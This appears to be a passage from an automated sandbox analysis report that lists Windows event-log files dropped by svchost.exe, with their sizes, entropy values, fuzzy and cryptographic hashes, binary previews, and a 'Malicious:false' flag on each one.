Preview:ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):77968
Entropy (8bit):3.339514668703203
Encrypted:false
SSDEEP:384:fWIjyeIXIpIBIsIEI2I5gI8bIqz1IkvIoIZIqIxIzIYI6IrIBI2I43hDIEQAGxIt:fJd3ZxGe6dX
MD5:F07A7699E03D5B71B9F19F3E22C99FEE
SHA1:7701FBB0623B2F1C85EF9F1A43FD121F2EEF6A63
SHA-256:99D6740A4674C1C185022B2E8B29EC2D83AF0DA4A8A2275CA0A3960C64BD72C8
SHA-512:DDA391BB346F356DF4623BCB3B3C2F16FDAB6F6BD53720C0C1F8387B158F2A6347B7048AB486B109F09AC354F44D5E3CAEA103003F5898AFFD8A3C7E682E38CE
Malicious:false
Preview:ElfChnk.T...............T...................x...h.....)......................................................................>..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......x........m0.PN.........Z...V..............................................................,.......D.....!........... ....@.m0.PN..0.U.f....2U.f...........x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l...........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.800476718060657
Encrypted:false
SSDEEP:384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
MD5:F25E3A5940E51F9A49AC271DE377E2C1
SHA1:38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
SHA-256:D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
SHA-512:CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
Malicious:false
Preview:ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):2.999140584854273
Encrypted:false
SSDEEP:768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
MD5:5234109523F4243D8DFEEAFD9202BC60
SHA1:49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
SHA-256:D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
SHA-512:C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
Malicious:false
Preview:ElfChnk.....................................(...8...|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):77496
Entropy (8bit):4.034465034834504
Encrypted:false
SSDEEP:768:Kexow407SZRcZv76NcRkpHrWbGyYKQc90XkztputDBjV8k+u3eUtHpoVWWPjRKv3:1ztputDBjV8k+u3PtHpoVWF
MD5:3F10D5677FB39CF11045012BF6A398A1
SHA1:EB0F1747BB64C2A109A0C7CC70B421DAD0C8C6A3
SHA-256:3AB79F9431F00F6EAFB5532E4DD44890620BB258AD36E067BA8C70733698FF2D
SHA-512:7CE98C74B22D1B99EDC9ADEB064A219477ECA0CEBCBB217EBBA46971E739511CFAACDA0D56533AC04C6394249B31FB0C1FD153E54D488AD129CF216701B334C1
Malicious:false
Preview:ElfChnk.................J.......O...............x..............................................................................................."...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..P...J.........$.QN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):68240
Entropy (8bit):4.405400501741596
Encrypted:false
SSDEEP:768:CYY1RFYY1RLpCnz/Gh4wRub4r2ag+LpSMI4ZStDCJ:CYYnFYYnLpqGhsi2pMnI4z
MD5:BA877BFABDB61D4D3A3E1C95DA76A3A7
SHA1:1F678EDFAB84317DCB7716C7CD8C1B2CF7DB5DD7
SHA-256:63BC91B902FFAD108344B46FF468CA20BD140EDB91548BB5AF04068A6AB71348
SHA-512:A5717B471836EF5C8CC975223E0C4DACAF139BB2FDD400610B4EE08BB345B6A99FDF98D0DC9D328DBE4CAEB4D28A95F0F586158B0AF2BE2DB3B302829D9608B0
Malicious:false
Preview:ElfChnk._......._......._......._...................e~.[....................................................................x.."................p...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...................I...................**......_...........PN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.760021633915647
Encrypted:false
SSDEEP:384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
MD5:91415CB1A68CB19DCDB017402AAEB51E
SHA1:EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
SHA-256:EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
SHA-512:C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
Malicious:false
Preview:ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.7640902535465997
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/XhZUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:/XvnS
                                                                                                                                MD5:D9B1E760925AFD6E03034D3295E2691F
                                                                                                                                SHA1:555CB7D82251B7D07B43B1D874429C60898E0A86
                                                                                                                                SHA-256:3E42AC1F97B1887FE0223484E46A973FC7BCB32EC349F09D4E0A3CC1EDE1D60C
                                                                                                                                SHA-512:D51557DBC9ADCC7651B950551020A671CF75C7080C3E773194F93F4D775F9015A16C06D5BB8135564B5DC59D7A7BDB08BED2DBEAF939FC7FDB867BF991C35A8D
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.4373812410985773
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
                                                                                                                                MD5:5166C2E32BD35C5E8D122799E53B4EA3
                                                                                                                                SHA1:628619C0E31F8C29ED260FCC063CD27935ACC25C
                                                                                                                                SHA-256:433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
                                                                                                                                SHA-512:E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):79576
                                                                                                                                Entropy (8bit):4.127796335209658
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:rhNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pJk5pbik5pKik5yY5Lbik5p9i8:rSLpBVi7CPqmxVjLv
                                                                                                                                MD5:11A70480184485AFBA8B7791B05128D7
                                                                                                                                SHA1:EF7BE97EC9B3E8DEF83B96557E1883761D3749A5
                                                                                                                                SHA-256:10A078034B838E5738AB776F636D5221947679B8811691D10E046BC6E5B19E82
                                                                                                                                SHA-512:02B0BFB4E785056026C025FE0E4482F93714C53286ED3CD82DD74E229FD3C5F3AD1AA0E828614E670E28D968C096D7A1A6ABA6868EC8CDF759CA603302836DF7
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.322146858454247
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
                                                                                                                                MD5:D8DABE7AC7FE8F2D1CD853002971BB8A
                                                                                                                                SHA1:AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
                                                                                                                                SHA-256:DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
                                                                                                                                SHA-512:A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.475265357832672
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
                                                                                                                                MD5:605D94FA0C65C59EECEECC2BEB2F61B5
                                                                                                                                SHA1:28CA14F5E02A0A0348C4AC4A22BC228390B64F94
                                                                                                                                SHA-256:4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
                                                                                                                                SHA-512:10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):93952
                                                                                                                                Entropy (8bit):4.456593840339493
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:SpBNHyfCVmRyzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBqpBNHyfCVmom:SLNHMCVmRyzFyNsk4cLSKph9YC/cmqbs
                                                                                                                                MD5:CDE0D8172C63CA2C5350495BD6A7417A
                                                                                                                                SHA1:1E82A9FCC129B2489154260B732C277B4212F495
                                                                                                                                SHA-256:4B4CDA6686D8896C60558ABD34473192D43667CF2C61DD33D443EE22E34043C5
                                                                                                                                SHA-512:8C74D0F34EEBFAC972B630348EBCF42D87BB9921CB0D657C2D4567F5A473B7FC3AD7590834909C1150CAE68C47D762F6AF457F07DCB11D44BFCEA2BDCFABF5C6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.517082344367377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
                                                                                                                                MD5:2628D3458E9FBE638FC3A49E317866FA
                                                                                                                                SHA1:8DB033ED373F8A837073679CE0F3B5DC1BD7085B
                                                                                                                                SHA-256:D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
                                                                                                                                SHA-512:6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.314954486903959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
                                                                                                                                MD5:864CAA67E4BF2A335E088526FF347CD9
                                                                                                                                SHA1:64E224001D864A18D4999F5D33A42C532877A361
                                                                                                                                SHA-256:C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
                                                                                                                                SHA-512:B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.773262505715791
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
                                                                                                                                MD5:C06B3BF303EBDD17D76D87B596EE5407
                                                                                                                                SHA1:BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
                                                                                                                                SHA-256:26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
                                                                                                                                SHA-512:7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.2371167268838485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
                                                                                                                                MD5:3F2115642206C3D448781C58F4EE8AF3
                                                                                                                                SHA1:1408F4FF05D6887F74B445E296BC9B69163EDDAE
                                                                                                                                SHA-256:84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
                                                                                                                                SHA-512:C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.1631981097466806
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
                                                                                                                                MD5:CBAE5379AAAD2B6A84714F5CEA39ACFA
                                                                                                                                SHA1:A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
                                                                                                                                SHA-256:726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
                                                                                                                                SHA-512:7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.036288214996343
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
                                                                                                                                MD5:80B64057A5C06D0016A06F2D493CF301
                                                                                                                                SHA1:452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
                                                                                                                                SHA-256:5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
                                                                                                                                SHA-512:4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.\...............\.......................X...j.......................................................................LU.t................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.166433348209963
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
                                                                                                                                MD5:9AB3073B8BEBBC3C1E9DCB47217C8E27
                                                                                                                                SHA1:33477618A675262EFDC74FACE70AE448EE9CAA05
                                                                                                                                SHA-256:E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
                                                                                                                                SHA-512:58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):144392
                                                                                                                                Entropy (8bit):4.680075877816149
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:AN0bGAyKAyUzAyBN0bGAyKAyUzAyj+nwDy8KhAy56N0bGAyKAyUzAyobYe:dQv0/Qv0UkdWQQv0z
                                                                                                                                MD5:9414F80A31868EBCD160247848B16DBD
                                                                                                                                SHA1:63E3DBA3D6A79AF32B0B9FC0B0992585300BAB51
                                                                                                                                SHA-256:8D45D52B541F3D16EDB58AB0E4F998ABFA1F752577A415C9927288DA40382C97
                                                                                                                                SHA-512:0026254DA0B0C97E6FBE862E48A0DB9FCC13AD2F99370AD194E710AF7B3DA5C400FA6E0331D242AB807EC643E72C0E72439CEDC4E7C7E17F4B9D01658A21654C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk..%......,&.......%......,&.......... ...X...i.......................................................................P...........................................6...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................M...........&.......................................**.......%.......V..PN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):79016
                                                                                                                                Entropy (8bit):1.8211201575481277
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:yBhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmQUmehL6UsE0Zu:WY7L8yY7L8
                                                                                                                                MD5:B0AAD4CF0D79F0E382014AAB35688B47
                                                                                                                                SHA1:4BD8A9DF7EFAE235AA9CF3A9A8A0DD7CF5A82EC8
                                                                                                                                SHA-256:EF0385E24249F469133B4AFADF6F95EA7C12AD059700E95174877D1986ECDD3A
                                                                                                                                SHA-512:7AA3692D0DA4E6FA10906A6ABDFC2573BD7155936257830C0B62C0FB509A0091BB402D3116AD61ED2047E13D97E3B79F1A8273B98EC99A842807CC4E56BE7A2A
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4..i.!......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):67776
                                                                                                                                Entropy (8bit):0.36810741683259496
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MauVWd8prP+8QNRBEZWTENO4brBE3ovPa/6yYuVWd8prP+8QNRBEZWTENO4brBEn:a8NVaO8iovC/6yP8NVaO8iovC/6y
                                                                                                                                MD5:F68A2754C4C1DD7BE6F25C5463F96DB1
                                                                                                                                SHA1:AEF943F956DF3029B721F9315A382975BE0F7DA5
                                                                                                                                SHA-256:D96FCE9B7296AFA226B1C36C53034F26749DA0306CEF65C2093578A0E6C5CCA4
                                                                                                                                SHA-512:ACD06B067B96BC5526469CCC3FBE94D660A382A62064B988E5CA5C9594F05A2A550D1B976D6128131DE2D8811D93CE319A6C43D65EB760DA6390EC869E003448
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk..............................................h~.....................................................................G..c................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**.................g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.9658503180918458
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
                                                                                                                                MD5:9961A2C4F5AC430AB4FE55D69904E2C9
                                                                                                                                SHA1:BA49A1A12A889812148BECC8D5B285AD418D54FE
                                                                                                                                SHA-256:EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
                                                                                                                                SHA-512:B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
                                                                                                                                Malicious:false
